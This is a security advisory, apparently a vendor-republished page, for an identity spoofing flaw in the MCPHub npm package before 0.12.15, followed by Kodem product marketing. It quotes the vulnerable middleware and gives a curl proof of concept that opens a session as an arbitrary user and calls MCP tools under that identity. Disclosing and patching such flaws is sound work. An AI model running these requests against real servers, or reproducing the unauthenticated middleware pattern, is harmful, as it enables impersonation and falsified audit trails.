GHSA-WF8Q-WVV8-P8JF

GHSA-WF8Q-WVV8-P8JF is a critical-severity security vulnerability in @samanhappy/mcphub (npm), affecting versions < 0.12.15. It is fixed in 0.12.15.

Summary

A critical identity spoofing vulnerability in MCPHub allows any unauthenticated user to impersonate any other user, including administrators, on SSE (Server-Sent Events) and MCP transport endpoints. The server accepts a username from the URL path parameter and creates an internal user session without any database validation, token verification, or authentication check. The source code itself acknowledges this gap with a TODO comment.

Details

MCPHub provides user-scoped SSE endpoints at the path /:user/sse/:group. The sseUserContextMiddleware in src/middlewares/userContext.ts (lines 42–75) extracts the username from req.params.user and constructs a fabricated IUser object directly, bypassing all authentication:

export const sseUserContextMiddleware = async (
  req: Request, res: Response, next: NextFunction,
): Promise<void> => {
  const userContextService = UserContextService.getInstance();
  const username = req.params.user;  // ← Taken directly from URL, no validation whatsoever

  if (username) {
    // Note: In a real implementation, you should validate the user exists
    // and has proper permissions
    const user: IUser = {
      username,          // ← Completely attacker-controlled
      password: '',
      isAdmin: false,    // TODO: Should be retrieved from user database
    };

    userContextService.setCurrentUser(user);  // ← Fabricated identity is accepted as real
    attachCleanupHandlers();
    console.log(`User context set for SSE/MCP endpoint: ${username}`);
    next();
  }
  // ...
};

The SSE routes in src/server.ts (lines 132–161) apply only rate limiting and this context middleware, there is no authentication middleware in the chain:

// User-scoped routes with user context middleware
this.app.get(
  `${this.basePath}/:user/sse/:group(.*)?`,
  mcpConnectionRateLimiter,        // Only rate limiting
  sseUserContextMiddleware,         // Identity from URL, no auth
  (req, res) => handleSseConnection(req, res),
);

Additionally, UserContextService is a singleton that stores the current user in a single instance variable. Under concurrent connections, one user's context can silently overwrite another's, creating a secondary race condition vulnerability (CWE-362).

PoC

Prerequisites: A running MCPHub instance with enableBearerAuth: false (or bearer keys not configured).

Step 1, Connect to the SSE endpoint as any arbitrary user:

curl -s -N --max-time 3 http://TARGET:3100/CEO-admin-impersonated/sse

Expected response, a valid SSE session is created:

event: endpoint
data: /CEO-admin-impersonated/messages?sessionId=54efc6f5-15ed-4e69-9a0e-de87d3179758

Step 2, Verify on the server side (server logs):

[INFO] User context set for SSE/MCP endpoint: CEO-admin-impersonated
[INFO] Creating SSE transport with messages path: /CEO-admin-impersonated/messages
[INFO] New SSE connection established: 54efc6f5-15ed-4e69-9a0e-de87d3179758 with group: global for user: CEO-admin-impersonated

The server accepted a completely non-existent user, created a full MCP session, and is ready to proxy tool calls under this fabricated identity. No database lookup was performed, no token was validated.

Step 3, Execute MCP tool calls under the spoofed identity:

Once the SSE session is established, the attacker can send MCP messages to the returned endpoint path, executing tools under the spoofed user's context:

curl -X POST http://TARGET:3100/CEO-admin-impersonated/messages?sessionId=54efc6f5-15ed-4e69-9a0e-de87d3179758 \
  -H 'Content-Type: application/json' \
  -d '{"jsonrpc":"2.0","id":1,"method":"tools/call","params":{"name":"any-tool","arguments":{}}}'

Impact

This is a user identity spoofing vulnerability on the MCP transport layer. Any unauthenticated network user can:

  • Impersonate any user, including administrators, on SSE/MCP endpoints
  • Execute MCP tool calls under a spoofed user's identity, potentially accessing user-scoped resources and data
  • Poison audit logs, all actions are recorded under the fabricated username, destroying accountability and forensic value
  • Access user-scoped servers and groups that should only be available to authenticated users

All MCPHub instances exposing SSE endpoints without bearer authentication are affected. This includes the default configuration when bearer keys are not explicitly set up.

Reported by the Eresus Security Research Team.

GHSA-WF8Q-WVV8-P8JF has a CVSS score of 9.1 (Critical). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.12.15); upgrading removes the vulnerable code path.

Affected versions

@samanhappy/mcphub (< 0.12.15)

Security releases

@samanhappy/mcphub → 0.12.15 (npm)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade @samanhappy/mcphub to 0.12.15 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is GHSA-WF8Q-WVV8-P8JF? GHSA-WF8Q-WVV8-P8JF is a critical-severity security vulnerability in @samanhappy/mcphub (npm), affecting versions < 0.12.15. It is fixed in 0.12.15.
  2. How severe is GHSA-WF8Q-WVV8-P8JF? GHSA-WF8Q-WVV8-P8JF has a CVSS score of 9.1 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of @samanhappy/mcphub are affected by GHSA-WF8Q-WVV8-P8JF? @samanhappy/mcphub (npm) versions < 0.12.15 is affected.
  4. Is there a fix for GHSA-WF8Q-WVV8-P8JF? Yes. GHSA-WF8Q-WVV8-P8JF is fixed in 0.12.15. Upgrade to this version or later.
  5. Is GHSA-WF8Q-WVV8-P8JF exploitable, and should I be worried? Whether GHSA-WF8Q-WVV8-P8JF is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether GHSA-WF8Q-WVV8-P8JF is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix GHSA-WF8Q-WVV8-P8JF? Upgrade @samanhappy/mcphub to 0.12.15 or later.

Other vulnerabilities in @samanhappy/mcphub

CVE-2025-13822CVE-2025-11287CVE-2025-11285

Stop the waste.
Protect your environment with Kodem.